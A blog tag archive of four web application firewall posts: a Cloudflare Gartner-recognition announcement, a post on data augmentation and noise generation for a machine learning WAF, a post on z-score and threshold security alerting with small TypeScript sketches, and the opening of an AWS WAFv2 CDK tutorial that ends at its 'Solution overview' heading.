Tag Archives: waf

Cloudflare named a Leader by Gartner

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/cloudflare-waap-named-leader-gartner-magic-quadrant-2022/

Gartner has recognised Cloudflare as a Leader in the 2022 “Gartner® Magic Quadrant™ for Web Application and API Protection (WAAP)” report that evaluated 11 vendors for their ‘ability to execute’ and ‘completeness of vision’.

You can register for a complimentary copy of the report here.

We believe this achievement highlights our continued commitment and investment in this space as we aim to provide better and more effective security solutions to our users and customers.

Keeping up with application security

With over 36 million HTTP requests per second processed by the Cloudflare global network, we get unprecedented visibility into network patterns and attack vectors. This scale allows us to effectively differentiate clean traffic from malicious traffic, with the result that about 1 in every 10 HTTP requests proxied by Cloudflare is mitigated at the edge by our WAAP portfolio.

Visibility is not enough, and as new use cases and patterns emerge, we invest in research and new product development. For example, API traffic is increasing (55%+ of total traffic) and we don’t expect this trend to slow down. To help customers with these new workloads, our API Gateway builds upon our WAF to provide better visibility and mitigations for well-structured API traffic for which we’ve observed different attack profiles compared to standard web based applications.

We believe our continued investment in application security has helped us gain our position in this space, and we’d like to thank Gartner for the recognition.

Cloudflare WAAP

At Cloudflare, we have built several features that fall under the Web Application and API Protection (WAAP) umbrella.

DDoS protection & mitigation

Our network, which spans more than 275 cities in over 100 countries, is the backbone of our platform, and is a core component that allows us to mitigate DDoS attacks of any size.

To help with this, our network is intentionally anycasted and advertises the same IP addresses from all locations, allowing us to “split” incoming traffic into manageable chunks that each location can handle with ease. This is especially important when mitigating large volumetric Distributed Denial of Service (DDoS) attacks.

The system is designed to require little to no configuration while also being “always-on”, ensuring attacks are mitigated instantly. Add to that some very smart software, such as our new location-aware mitigation, and DDoS attacks become a solved problem.

For customers with very specific traffic patterns, full configurability of our DDoS Managed Rules is just a click away.

Web Application Firewall

Our WAF is a core component of our application security and ensures hackers and vulnerability scanners have a hard time trying to find potential vulnerabilities in web applications.

This is very important when zero-day vulnerabilities become publicly available, as we’ve seen bad actors attempt to leverage new vectors within hours of them becoming public. Log4J, and even more recently the Confluence CVE, are just two examples where we observed this behavior. That’s why our WAF is also backed by a team of security experts who constantly monitor and develop/improve signatures to ensure we “buy” precious time for our customers to harden and patch their backend systems when necessary. Additionally, and complementary to signatures, our WAF machine learning system classifies each request, providing a much wider view into traffic patterns.

Our WAF comes packed with many advanced features, such as leaked credential checks, advanced analytics and alerting, and payload logging.

Bot Management

It is no secret that a large portion of web traffic is automated, and while not all automation is bad, some is unnecessary and may also be malicious.

Our Bot Management product works in parallel to our WAF and scores every request with the likelihood of it being generated by a bot, allowing you to easily filter unwanted traffic by deploying a WAF Custom Rule, all of it backed by powerful analytics. We make this easy by also maintaining a list of verified bots that can be used to further improve a security policy.

In the event you want to block automated traffic, Cloudflare’s managed challenge ensures that only bots receive a hard time without impacting the experience of real users.

API Gateway

API traffic, by definition, is very well-structured relative to standard web pages consumed by browsers. At the same time, APIs tend to be closer abstractions to back end databases and services, attracting increased attention from malicious actors while often going unnoticed even by internal security teams (shadow APIs).

API Gateway, which can be layered on top of our WAF, helps you both discover API endpoints served by your infrastructure and detect potential anomalies in traffic flows that may indicate compromise, from both a volumetric and a sequential perspective.

The nature of APIs also allows API Gateway to provide a positive security model far more easily than our WAF: only allow known good traffic and block everything else. Customers can leverage schema protection and mutual TLS authentication (mTLS) to achieve this with ease.

Page Shield

Attacks that leverage the browser environment directly can go unnoticed for some time, as they don’t necessarily require the back end application to be compromised. For example, if any third party JavaScript library used by a web application performs malicious actions, application administrators and users may be none the wiser while credit card details are being leaked to a third party endpoint controlled by an attacker. This is a common vector for Magecart, one of many client side security attacks.

Page Shield addresses client side security by actively monitoring third party libraries and alerting application owners whenever a third party asset shows malicious activity. It leverages both public standards such as content security policies (CSP) and custom classifiers to ensure coverage.

Page Shield, just like our other WAAP products, is fully integrated on the Cloudflare platform and requires a single click to turn on.

Security Center

Cloudflare’s new Security Center is the home of the WAAP portfolio. A single place for security professionals to get a broad view across both network and infrastructure assets protected by Cloudflare.

Moving forward we plan for the Security Center to be the starting point for forensics and analysis, allowing you to also leverage Cloudflare threat intelligence when investigating incidents.

The Cloudflare advantage

Our WAAP portfolio is delivered from a single horizontal platform, allowing you to leverage all security features without additional deployments. Additionally, scaling, maintenance and updates are fully managed by Cloudflare allowing you to focus on delivering business value on your application.

This applies even beyond WAAP, as, although we started building products and services for web applications, our position in the network allows us to protect anything connected to the Internet, including teams, offices and internal facing applications. All from the same single platform. Our Zero Trust portfolio is now an integral part of our business and WAAP customers can start leveraging our secure access service edge (SASE) with just a few clicks.

If you are looking to consolidate your security posture, both from a management and budget perspective, application services teams can use the same platform that internal IT services teams use, to protect staff and internal networks.

Continuous innovation

We did not build our WAAP portfolio overnight, and in the past year alone we’ve shipped more than five major WAAP security product releases. To showcase our speed of innovation, here is a selection of our top picks:

  • API Shield Schema Protection: traditional signature-based WAF approaches (negative security model) don’t always work well with well-structured data such as API traffic. Given the fast growth in API traffic across the network we built a new incremental product that allows you to enforce API schemas directly at the edge using a positive security model: only let well-formed data through to your origin web servers;
  • API Abuse Detection: complementary to API Schema Protection, API Abuse Detection warns you whenever anomalies are detected on your API endpoints. These can be triggered by unusual traffic flows or patterns that don’t follow normal traffic activity;
  • Our new Web Application Firewall: built on top of our new Edge Rules Engine, the core Web Application Firewall received a complete overhaul, all the way from engine internals to the UI. Better performance both in terms of latency and efficacy at blocking malicious payloads, along with brand-new capabilities including but not limited to Exposed Credential Checks, account wide configurations and payload logging;
  • DDoS customizable Managed Rules: to provide additional configuration flexibility, we started exposing some of our internal DDoS mitigation managed rules for custom configurations to further reduce false positives and allow customers to increase thresholds / detections as required;
  • Security Center: Cloudflare’s view of infrastructure and network assets, along with alerts and notifications for misconfigurations and potential security issues;
  • Page Shield: based on growing customer demand and the rise of attack vectors focusing on the end user browser environment, Page Shield helps you detect whenever malicious JavaScript may have made its way into your application’s code;
  • API Gateway: full API management, including routing directly from the Cloudflare edge, with API Security baked in, including encryption and mutual TLS authentication (mTLS);
  • Machine Learning WAF: complementary to our WAF Managed Rulesets, our new ML WAF engine scores every single request from 1 (likely malicious) to 99 (likely clean), giving you additional visibility into both valid and invalid malicious payloads and increasing our ability to detect targeted attacks and scans against your application.

Looking forward

Our roadmap is packed with both new application security features and improvements to existing systems. As we learn more about the Internet we find ourselves better equipped to keep your applications safe. Stay tuned for more.

Gartner, “Magic Quadrant for Web Application and API Protection”, Analyst(s): Jeremy D’Hoinne, Rajpreet Kaur, John Watts, Adam Hils, August 30, 2022.

Gartner and Magic Quadrant are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation.

Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Improving the accuracy of our machine learning WAF using data augmentation and sampling

Post Syndicated from Vikram Grover original https://blog.cloudflare.com/data-generation-and-sampling-strategies/

At Cloudflare, we are always looking for ways to make our customers’ applications faster and more secure. A key part of that commitment is our ongoing investment in research and development of new technologies, such as the work on our machine learning based Web Application Firewall (WAF) solution we announced during Security Week.

In this blog, we’ll be discussing some of the data challenges we encountered during the machine learning development process, and how we addressed them with a combination of data augmentation and generation techniques.

Let’s jump right in!

Introduction

The purpose of a WAF is to analyze the characteristics of an HTTP request and determine whether the request contains any data which may cause damage to destination server systems, or was generated by an entity with malicious intent. A WAF typically protects applications from common attack vectors such as cross-site scripting (XSS), file inclusion, and SQL injection, to name a few. These attacks can result in the loss of sensitive user data and damage to critical software infrastructure, leading to monetary loss and reputation risk, along with direct harm to customers.

How do we use machine learning for the WAF?

The Cloudflare ML solution, at a high level, trains a classifier to distinguish between various traffic types and attack vectors, such as SQLi, XSS, Command Injection, etc., based on structural or statistical properties of the content. This is achieved by performing the following operations:

  1. We inspect the raw HTTP input and perform a number of transformations on it, such as normalization, content substitutions, and de-duplication.
  2. We decompose or partition it via some process of tokenization, generate statistical information about the content, or extract structural data.
  3. We compute optimal internal numerical representations of the inputs via the process of training the model. The nature of these internal representations depends on the class of model and architecture.
  4. We learn to map internal content representations to classes (XSS, SQLi, or others), scores, or some other target of interest.
  5. At run-time, we use the previously learned representations and mappings to analyze a new input and provide the most likely label or score for it. The score ranges from 1 to 99, with 1 indicating that the request is almost certainly malicious and 99 indicating that the request is probably clean.
[Figure: high-level flow of the machine learning WAF, from raw HTTP request to score]
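
To make steps 1 and 2 concrete, here is a minimal TypeScript sketch of the kind of normalization and tokenization involved. The helpers and choices below (lowercasing, percent-decoding, character trigrams) are illustrative assumptions, not the production pipeline:

// Step 1: normalize the raw input so equivalent payloads look alike.
function normalize(raw: string): string {
  let s = raw.toLowerCase();
  try {
    s = decodeURIComponent(s); // undo percent-encoding
  } catch {
    // keep malformed encodings as-is
  }
  return s.replace(/\s+/g, ' ').trim(); // collapse whitespace
}

// Step 2: decompose the content into tokens the model can consume.
function tokenize(s: string, n = 3): string[] {
  const ngrams: string[] = [];
  for (let i = 0; i + n <= s.length; i++) {
    ngrams.push(s.slice(i, i + n));
  }
  return ngrams;
}

// tokenize(normalize('SELECT%20*%20FROM users')) yields character
// trigrams such as 'sel', 'ele', 'lec', ...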

This reasonable starting point stumbles immediately upon a critical challenge: we need high quality labeled data, and lots of it, as data has the biggest impact on model performance. Contrary to well-researched fields like image recognition, text sentiment analysis, or classification, large datasets of HTTP requests with malicious payloads embedded are difficult to get.

To make matters even harder, strict implementation requirements for a production-quality WAF restrict the complexity of our potential ML models or architectures to ones that are relatively simple and lightweight, implying that we cannot simply pave over shortcomings of the data.

Data and challenges

The selection of a dataset is likely the most difficult of all the aspects that contribute to the final attributes of a machine learning model. In most cases, the model is tasked with learning the distribution of the data in some statistical sense, so choosing and curating the dataset to ensure that the desired properties of the final solution are even possible to learn is crucial. ML models are only as reliable as the data used to train them. If we train an ML model on an incomplete dataset, or on data that doesn’t accurately represent the population, predictions might be inaccurate as they will be a direct reflection of the data.

To build a strong ML WAF, a good dataset must have large volumes of heterogeneous data covering malicious samples for all attack categories, a diverse set of negative/benign samples, and samples representing a broad spectrum of obfuscation techniques.

Due to those constraints, creating a solid dataset has a number of challenges:

Privacy

Privacy requirements limit data availability and how it can be used. Cloudflare has strict privacy guidelines and does not keep all request data – it simply isn’t available, and what is available must be carefully selected, anonymised, and stripped of sensitive information.

Heterogeneity of samples

Due to the wide assortment of potential request content types and forms, finding enough benign samples is difficult. Furthermore, it is challenging to collect data that represents requests with various charsets and content-encodings. Covering all attack configurations is also important because some attacks can be inserted into essentially any kind of request (e.g., five bytes in a huge “regular” request).

Sample difficulty

We want a dataset with a good mix of attack techniques, not one dominated by samples easily generated by tools which simply swap out constants, transform expressions through invariants, and so on (e.g., sqli-fuzzer). Additionally, the vast majority of freely available samples in the wild are fairly trivial auto-generated payloads produced by indiscriminate scanning and discovery tools. They have very similar structural and statistical characteristics. Some of them are fairly old as well and do not reflect the current software landscape. How to “grade” sample difficulty is not immediately obvious, either: what’s easy for a human may not be easy for a particular preprocessor/model, and vice versa.

Noisy labels

Label noise affects results significantly, especially when it comes to esoteric, specific, or unusual attacks, which are likely to be classified as benign by a rules-based WAF.

What’s the strategy to overcome this?

Data augmentation

In simple terms, data augmentation is the process of generating artificial (but realistic) data to increase the diversity of our data by studying the statistical distribution of existing real-world data.

This is crucial for us because one of the biggest concerns with rules-based WAFs is false positives. False positives are a serious challenge for WAFs because the risk of accidentally filtering legitimate traffic deters users from employing very strict rulesets. Data augmentation is used to build a solution that does not rely on observing specific high-risk keywords or character sequences, but instead uses a more holistic analysis of content and context, making it considerably less likely to block legitimate requests.

There are many sequences of characters which appear almost exclusively in payloads, but are themselves not dangerous. In order to reduce false positives and improve overall performance, we focussed on generating a lot of heterogeneous negative samples to force the model to consider the structural, semantic, and statistical properties of the content when making a classification decision.

In the context of our data and use cases, data augmentation means that we mutate benign content in a variety of ways under which the content remains benign (with probability 1, a mutation isn’t going to accidentally turn it into a valid payload). For instance, we can add random character noise, permute keywords, merge benign content together from multiple sources, and so on. Alternatively, we can seed benign content with “dangerous” keywords or n-grams frequently occurring in payloads: this results in a benign sample, but ideally teaches the model not to be too sensitive to the presence of malicious tokens lacking the proper semantics and structure.
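
As a rough sketch, benign-preserving mutations like the ones described could look as follows (helper names and details are illustrative, not Cloudflare’s actual augmentation code):

// Add random character noise at a random position; a benign string
// stays benign.
function addNoise(sample: string, alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'): string {
  const pos = Math.floor(Math.random() * (sample.length + 1));
  const ch = alphabet[Math.floor(Math.random() * alphabet.length)];
  return sample.slice(0, pos) + ch + sample.slice(pos);
}

// Merge benign content from multiple sources into one sample.
function mergeBenign(samples: string[]): string {
  return samples.join(' ');
}

// Seed benign content with a 'dangerous' keyword that lacks the
// semantics and structure of a real payload.
function seedWithKeyword(sample: string, keywords: string[]): string {
  const kw = keywords[Math.floor(Math.random() * keywords.length)];
  return sample + ' ' + kw;
}

// e.g. seedWithKeyword('order=price&dir=asc', ['select', 'union'])
// is still benign, but now contains an SQL keyword.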

Benign content

First and foremost, generating benign content is far easier. Mutating a malicious block of content into different malicious blocks is difficult because malicious payloads have a stricter grammar and syntax than general HTTP content: they contain code, and must therefore be manipulated in a specific manner.

However, there are a few options if we want to do this in the future. Tools like sqli-fuzzer automate the process of fuzzing a given payload by applying transformations which preserve the underlying semantics while changing the representation or adding obfuscation. Outside existing third-party tools, it’s possible to generate our own malicious payloads using various “append malicious content to non-malicious content” techniques, with the trade-off that this doesn’t actually generate *new* malicious content, it just puts existing payloads into a different context.

Pseudo-random noise samples

A useful approach we identified for bolstering the number of negative training samples was to generate large quantities of pseudo-random strings of increasing complexity.

The probability of any pseudo-random string (drawn from essentially any token distribution) being a valid payload or malicious attack is essentially zero, but we can build a series of token sampling distributions that make it increasingly difficult for the model to distinguish them from a real payload, and we discovered that this resulted in dramatically better performance in terms of false positive rate, robustness, and overall model properties.

This approach works by taking a collection of tokens and a probability distribution over these tokens, and independently sampling a stream of tokens from it to create our ‘sample’. Each sample length is selected from a separate discrete sample length distribution.

For an extremely simple example, we could take a token collection consisting of ASCII characters and a uniform sampling distribution:

['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']

We sample random strings of length 0-32 from this to get some (uninteresting) negative samples:

8hwk1d740hfstbb4aogbpi4qayppvdl41b6blornuzktp4yl

1deq7rug1zftmn9tjr73yttjnye99zh2140z2x9lr8n6sxhucdgn6bmqvfv7auw8fwbkrtxilk45ht-
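
A minimal sketch of such a generator (uniform token and length distributions shown; weighted distributions over richer token collections work the same way):

// Build one negative sample by independently drawing tokens from a
// collection. Tokens may be single characters or longer fragments.
function noiseSample(tokens: string[], maxLen: number): string {
  // Draw the sample length from a (here: uniform) length distribution.
  const len = Math.floor(Math.random() * (maxLen + 1));
  let out = '';
  for (let i = 0; i < len; i++) {
    out += tokens[Math.floor(Math.random() * tokens.length)];
  }
  return out;
}

const alnum = 'abcdefghijklmnopqrstuvwxyz0123456789'.split('');
console.log(noiseSample(alnum, 32)); // e.g. "8hwk1d740hfstbb4aogb"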

We wouldn’t expect even a very simple model to struggle to learn that these samples are benign, but as we increase the complexity of the token collections, we can move towards much more “difficult” noise examples, including elements such as fragments of valid URIs, user agents, XML/XSLT content, or even restricted language identifiers or keywords.

Here are some examples of more complex token collections and the kinds of random strings they produce as our negative samples:

Ascii_script: alphanumeric characters plus '<', '>', '/', '</', '-', '+', '=', '< ', ' >', ' ', ' />'

[Image: example noise strings sampled from the ascii_script token collection]

Alphanumerics, plus special characters, plus a variant of full JavaScript or SQL keywords and (multi-character) sub-token fragments:

[Image: example noise strings sampled from the keyword-enriched token collection]

It’s fairly straightforward to construct a suite of these noise generators of varying complexity, targeting different types of content: JSON, XML, URIs with SQL-esque “noise”, and so on. As the strings get sufficiently long, the probability that they will contain at least some dangerous-looking subsequences grows, so this is also an excellent test of model robustness.

We make extensive use of noise strings to enhance the core dataset used for training and testing the model: we train the model directly on increasingly difficult noise before fine-tuning on exclusively real data, we append noise of varying complexity to malicious (real) or benign samples to both induce and test for model robustness against padding attacks, and we use noise to estimate the false positive rate for certain classes of benign content.

Beyond independent sampling of random strings?

A natural extension to the above method for generating pseudo-random strings is to drop the ‘independence’ assumption for sampling tokens. This means that we start to emulate, to some extent, the process by which real data is generated, yielding samples with increasingly realistic local (and eventually global) structure. Approaches here range from a simple Markov chain all the way to state-of-the-art Large Language Models.
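
As a hedged illustration of the simplest step beyond independence, a first-order Markov chain over characters draws each token conditioned on the previous one, giving samples more realistic local structure:

// Train: record which characters follow each character in a corpus.
function trainMarkov(corpus: string[]): Map<string, string[]> {
  const next = new Map<string, string[]>();
  for (const s of corpus) {
    for (let i = 0; i + 1 < s.length; i++) {
      const followers = next.get(s[i]) ?? [];
      followers.push(s[i + 1]);
      next.set(s[i], followers);
    }
  }
  return next;
}

// Sample: extend a seed character by repeatedly drawing a follower
// of the most recent character.
function sampleMarkov(next: Map<string, string[]>, seed: string, len: number): string {
  let out = seed;
  while (out.length < len) {
    const followers = next.get(out[out.length - 1]);
    if (!followers || followers.length === 0) break;
    out += followers[Math.floor(Math.random() * followers.length)];
  }
  return out;
}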

We experimented with contemporary autoregressive language models trained on our corpus of real malicious payloads and found them extremely effective at generating novel payloads, as well as at transforming payloads into sophisticated obfuscated representations. As the language models approached convergence on the data, the likelihood of each sample being a valid payload approached 100%, allowing us to use early samples as ‘extremely strong negatives’ and later samples as positive samples. The success of this work suggests that deeper investigation into the use of language models for security analysis may be fruitful, not only for training classifiers, but also for creating powerful adversarial pen-testing agents.

Results summary

Let’s see a comparative summary of results and improvements, before and after the augmentation:

Model performance on evaluation metrics

The effectiveness of machine learning models for classification problems can be evaluated using a wide range of metrics, including accuracy, precision, recall, F1 score, and others. It is important to note that in addition to quantitative metrics, we also consider the model’s general properties and behavioral constraints. This combined criteria-and-metrics approach is especially important in our domain, where data is inherently noisy, labels are not trustworthy, and the domain of the inputs is extremely large and hard to cover with samples.

For this post, we will concentrate on key quantitative metrics like the F1 score, even though we examine a variety of metrics to assess model performance. The F1 score is the harmonic mean of precision and recall. We can represent it with the formula:

F1 = 2 × (Precision × Recall) / (Precision + Recall)

where:

True Positives (TP): malicious content classified correctly by the model

False Positives (FP): benign content that the model classified as malicious

True Negatives (TN): benign content classified correctly by the model

False Negatives (FN): malicious content that the model classified as benign
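
As a small illustration, the per-class F1 score and its macro average can be computed directly from these counts (a sketch of the standard formulas):

interface Counts { tp: number; fp: number; fn: number }

// Precision, recall, and F1 from per-class confusion counts.
function f1(c: Counts): number {
  const precision = c.tp + c.fp > 0 ? c.tp / (c.tp + c.fp) : 0;
  const recall = c.tp + c.fn > 0 ? c.tp / (c.tp + c.fn) : 0;
  return precision + recall > 0
    ? (2 * precision * recall) / (precision + recall)
    : 0;
}

// Macro F1: the unweighted mean of the per-class F1 scores.
function macroF1(classes: Counts[]): number {
  return classes.reduce((sum, c) => sum + f1(c), 0) / classes.length;
}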

Since this formula takes both false positives and false negatives into account, the F1 score is more reliable than metrics such as plain accuracy. There are a few ways to calculate it for multi-class problems, such as the macro F1 score, micro F1 score, and weighted F1 score. Although each method has advantages and disadvantages, we obtained nearly identical results with all three. Below are the numbers:

Class                      Without Augmentation            With Augmentation
                           Precision  Recall  F1 Score     Precision  Recall  F1 Score
Benign                     0.69       0.17    0.27         0.98       1.00    0.99
SQLi                       0.77       0.96    0.85         1.00       1.00    1.00
XSS                        0.56       0.94    0.70         1.00       0.98    0.99
Total (Micro Average)                         0.67                            0.99
Total (Macro Average)      0.67       0.69    0.61         0.99       0.99    0.99
Total (Weighted Average)   0.68       0.67    0.60         0.99       0.99    0.99

Note that the F1 score ranges from 0 (worst) to 1 (best).

After augmentation, the model shows balanced precision and recall and strong overall performance: the macro F1 score improves from 0.61 to 0.99.

So far in the results summary we’ve only discussed the F1 score; however, we’ve also observed other improvements in the model’s characteristics, listed below:

False positive characteristics

  • Estimated false positive rate reduced by approximately 80% on test data sets. There are significantly fewer false positives involving PromQL and other SQL-structured analogues. PromQL examples result in high scores and are classified correctly:
[Image: PromQL examples receiving high (clean) scores and being classified correctly]

Today, the only major category of false positives is literal SQL or JavaScript files.

  • The general false positive rate on noise from JSON-esque, XML/SOAP-esque, and SQL-esque content generators was reduced to about 1/100,000, from rates between roughly 1/50 and 1/1.

True positive characteristics

  • True positive rate for highly fuzzed content is vastly improved. Models trained solely on real data were easily bypassed by advanced fuzzing tools, whereas models trained on real plus augmented data are extremely resistant, with many payloads receiving higher risk scores as fuzzing increases. Examples:
[Image: examples of heavily fuzzed payloads that the augmented model still catches]

These yield approximately the same scores, as they differ by only a few byte alterations.

  • About 97.5% of payloads in client-provided test sets (primarily containing payloads not blocked by the rules-based WAF for XSS/SQLi) are now successfully classified, up from about 91% (with the remaining 2.5% being arguable).
  • Padding a payload with almost any amount of ASCII, JSON-esque, special-character, or other content will not reduce the risk score substantially. Thanks to the addition of long, hard-noise augmented training samples, even a six byte payload in a 100 kilobyte string will be caught. Examples:
[Image: a short payload with and without junk padding, receiving similar scores]

They both generate similar scores even though the latter has junk padding around the payload.

Execution performance

  • Runtime characteristics are unchanged for inference.

On top of that, we validated the model against Cloudflare’s highly mature signature-based WAF and confirmed that the machine learning WAF performs comparably to the signature WAF, demonstrating particular strength in correctly handling highly obfuscated or irregularly fuzzed content (as well as avoiding some false positives of the rules-based engine). Finally, we were able to conclude that augmentation helps improve model performance and induce the right set of properties.

Conclusion

We built a machine learning powered WAF while facing the substantial challenge of gathering a diverse training set under constraints that rule out sensitive real customer data for privacy and regulatory reasons. To create a broader and more diverse dataset without requiring vast amounts of sensitive data, we used techniques such as fuzzing, data augmentation, and synthetic data generation. This allowed us to improve the solution’s false positive robustness and overall model performance.

Furthermore, these techniques reduced the time needed to retrieve and clean real data, and helped induce the correct model behavior. In the future, we intend to investigate autoregressive language models to generate synthetic pseudo-valid payloads.

Introducing thresholds in Security Event Alerting: a z-score love story

Post Syndicated from Kristina Galicova original https://blog.cloudflare.com/introducing-thresholds-in-security-event-alerting-a-z-score-love-story/

Today we are excited to announce thresholds for our Security Event Alerts: a new and improved way of detecting anomalous spikes of security events on your Internet properties. Previously, our calculations were based on z-score methodology alone, which was able to determine most of the significant spikes. By introducing a threshold, we are able to make alerts more accurate and only notify you when it truly matters. One can think of it as a romance between the two strategies. This is the story of how they met.

Author’s note: as an intern at Cloudflare, I got to work on this project from start to finish, from investigation all the way to the final product.

Once upon a time

In the beginning, there were Security Event Alerts. Security Event Alerts are notifications that are sent whenever we detect a threat to your Internet property. As the name suggests, they track the number of security events, which are requests to your application that match security rules. For example, you can configure a security rule that blocks access from certain countries. Every time a user from that country tries to access your Internet property, it will log as a security event. While a security event may be harmless and fired as a result of the natural flow of traffic, it is important to alert on instances when a rule is fired more times than usual. Anomalous spikes of too many security events in a short period of time can indicate an attack. To find these anomalies and distinguish between the natural number of security events and that which poses a threat, we need a good strategy.

The lonely life of a z-score

Before a threshold entered the picture, our strategy worked only on the basis of a z-score. Z-score is a methodology that looks at the number of standard deviations a certain data point is from the mean. In our current configuration, if a spike crosses the z-score value of 3.5, we send you an alert. This value was decided on after careful analysis of our customers’ data, finding it the most effective in determining a legitimate alert. Any lower and notifications will get noisy for smaller spikes. Any higher and we may miss out on significant events. You can read more about our z-score methodology in this blog post.
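
In code, the core calculation takes only a few lines. A minimal TypeScript sketch of the standard formula (not the production implementation):

// z-score of the latest data point relative to its history.
function zScore(history: number[], latest: number): number {
  const mean = history.reduce((a, b) => a + b, 0) / history.length;
  const variance =
    history.reduce((a, b) => a + (b - mean) ** 2, 0) / history.length;
  // Infinity when the standard deviation is 0 and latest exceeds the mean.
  return (latest - mean) / Math.sqrt(variance);
}

const history = [12, 9, 14, 11, 10, 13];
console.log(zScore(history, 48) > 3.5); // true: an anomalous spike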

The following graphs are an example of how the z-score method works. The first graph shows the number of security events over time, with a recent spike.

[Graph: number of security events over time, ending in a recent spike]

To determine whether this spike is significant, we calculate the z-score and check if the value is above 3.5:

[Graph: z-score of the spike, above the 3.5 cutoff]

As the graph shows, the deviation is above 3.5 and so an alert is triggered.

However, relying on the z-score becomes tricky for domains that experience no security events for a long period of time. With many security events at zero, the mean and standard deviation drop to zero as well. When a non-zero value finally appears, it will always be infinitely many standard deviations away from the mean. As a result, it will always trigger an alert, even on spikes that do not pose any threat to your domain, such as the one below:

[Graph: a small spike to five security events after a long run of zeros]

With five security events, you are likely going to ignore this spike, as it is too low to indicate a meaningful threat. However, the z-score in this instance will be infinite:

[Graph: the z-score of the small spike is infinite]

Since a z-score of infinity is greater than 3.5, an alert will be triggered. This means that customers with few security events would often be overwhelmed by event alerts that are not worth worrying about.

Letting go of zeros

To avoid the mean and standard deviation becoming zero and thus alerting on every non-zero spike, zero values can be ignored in the calculation. In other words, to calculate the mean and standard deviation, only data points that are higher than zero will be considered.

With those conditions, the same spike to five security events will now generate a different z-score:

[Graph: with zeros excluded, the z-score of the five-event spike is zero]

Great! With the z-score at zero, it will no longer trigger an alert on the harmless spike!

But what about spikes that could be harmful? When calculations ignore zeros, we need enough non-zero data points to accurately determine the mean and standard deviation. If only one non-zero value is present, that data point determines the mean and standard deviation. As such, the mean will always be equal to the spike, z-score will always be zero and an alert will never be triggered:

[Graph: a single non-zero data point sets both the mean and the standard deviation]

For a spike of 1000 events, we can tell that there is something wrong and we should trigger an alert. However, because there is only one non-zero data point, the z-score will remain zero:

[Graph: the z-score remains zero even for a spike of 1000 events]

The z-score does not cross the value 3.5 and an alert will not be triggered.

So what’s better? Including zeros in our calculations skews the results for domains with too many zero events and alerts them every time a spike appears. Excluding zeros is mathematically unsound and will never alert on these spikes.

Threshold, the prince charming

Clearly, a z-score is not enough on its own.

Instead, we paired up the z-score with a threshold. The threshold represents the raw number of security events an Internet property can have, below which an alert will not be sent. While z-score checks whether the spike is at least 3.5 standard deviations above the mean, the threshold makes sure it is above a certain static value. If both of these conditions are met, we will send you an alert:

[Graph: a spike crossing the threshold of 200 security events]

The above spike crosses the threshold of 200 security events. We now have to check that the z-score is above 3.5:

[Graph: the z-score of the spike is above 3.5]

The z-score value crosses 3.5 and an alert will be sent.

A threshold for the number of security events comes as the perfect complement. By itself, the threshold cannot determine whether something is a spike, and would simply alert on any value crossing it. This blog post describes in more detail why thresholds alone do not work. However, when paired with z-score, they are able to share their strengths and cover for each other’s weaknesses. If the z-score falsely detects an insignificant spike, the threshold will stop the alert from triggering. Conversely, if a value does cross the security events threshold, the z-score ensures there is a reasonable variance from the data average before allowing an alert to be sent.
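
To make the pairing concrete, here is a minimal TypeScript sketch of the combined check, with zeros excluded from the statistics, the 3.5 z-score cutoff, and the 200 security event threshold (the production system is more involved):

const THRESHOLD = 200; // minimum raw number of security events
const Z_CUTOFF = 3.5;  // minimum standard deviations above the mean

function shouldAlert(history: number[], latest: number): boolean {
  if (latest < THRESHOLD) return false; // too small to matter

  // Ignore zeros so quiet domains don't collapse the statistics.
  const nonZero = history.filter((x) => x > 0);
  if (nonZero.length < 2) return false; // not enough data for a meaningful z-score

  const mean = nonZero.reduce((a, b) => a + b, 0) / nonZero.length;
  const variance =
    nonZero.reduce((a, b) => a + (b - mean) ** 2, 0) / nonZero.length;
  const std = Math.sqrt(variance);
  if (std === 0) return false;

  return (latest - mean) / std > Z_CUTOFF;
}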

The invaluable value

To foster a successful relationship between the z-score and security events threshold, we needed to determine the most effective threshold value. After careful analysis of our previous attacks on customers, we set the value to 200. This number is high enough to filter out the smaller, noisier spikes, but low enough to expose any threats.

Am I invited to the wedding?

Yes, you are! The z-score and threshold relationship is already enabled for all WAF customers, so all you need to do is sit back and relax. For enterprise customers, the threshold will be applied to each type of alert enabled on your domain.

Happily ever after

The story certainly does not end here. We are constantly iterating on our alerts, so keep an eye out for future updates on the road to make our algorithms even more personalized for your Internet properties!

Easily protect your AWS CDK-defined infrastructure with AWS WAFv2

Post Syndicated from Ramon Lopez Narvaez original https://aws.amazon.com/blogs/devops/easily-protect-your-aws-cdk-defined-infrastructure-with-aws-wafv2/

Security is a shared responsibility between AWS and the customer. When we use infrastructure as code (IaC) we want to describe workloads holistically, and that includes the configuration of firewalls alongside the entrypoints to web applications. As we evolve the infrastructure that our application is built upon, we can adjust firewall rules in the same place.

In this post, you’ll learn how you can easily add a layer of protection to your web application that is defined in AWS Cloud Development Kit (AWS CDK) and built using Amazon CloudFront, Amazon API Gateway, Application Load Balancer, or AWS AppSync.

To accomplish this, we’ll use AWS WAFv2. Although it’s usually complex to write your own firewall rules, we can simply use AWS Managed Rules. No tedious setup required!

What is AWS WAFv2?

AWS WAFv2 is a managed web application firewall. It can be natively enabled on CloudFront, API Gateway, Application Load Balancer, or AWS AppSync and is deployed alongside these services. AWS services terminate the TCP/TLS connection, process incoming HTTP requests, and then pass the request to AWS WAF for inspection and filtering.

For example, you can use AWS WAFv2 to protect against attacks, such as cross-site request forgery (CSRF), cross-site scripting (XSS), and SQL injection (SQLi) among other threats in the OWASP Top 10.

AWS Managed Rules for AWS WAF is a set of AWS WAF rules curated and maintained by the AWS Threat Research Team that provides protection against common application vulnerabilities or other unwanted traffic, without having to write your own rules.

Prerequisites

For this walkthrough, you should have the following prerequisites:

  • An AWS account
  • An application fronted by one or more of the following services: Amazon CloudFront, Amazon API Gateway, Application Load Balancer, or AWS AppSync. From here on, these are called the ‘entrypoint’.
  • At least the above-mentioned ‘entrypoint’ defined in AWS CDK.

Solution overview

